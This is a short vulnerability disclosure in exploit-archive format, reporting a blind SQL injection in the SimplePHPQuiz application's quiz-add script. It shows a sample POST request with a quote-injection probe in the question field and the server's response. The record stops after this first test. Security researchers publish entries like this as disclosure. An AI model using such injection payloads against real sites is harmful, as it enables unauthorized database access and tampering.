# Exploit Title: SimplePHPQuiz - Blind SQL Injection # Date: 2016-08-23 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/valokafor/SimplePHPQuiz # Software Link: https://github.com/valokafor/SimplePHPQuiz/archive/master.zip # Version: Latest commit # Tested on: Debian [wheezy] ### Vulnerability 1-1. Nomal Request POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1 Host: 127.0.0.1 ..snip.. Content-Length: 96 question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit 1-2 Response
Your quiz has been saved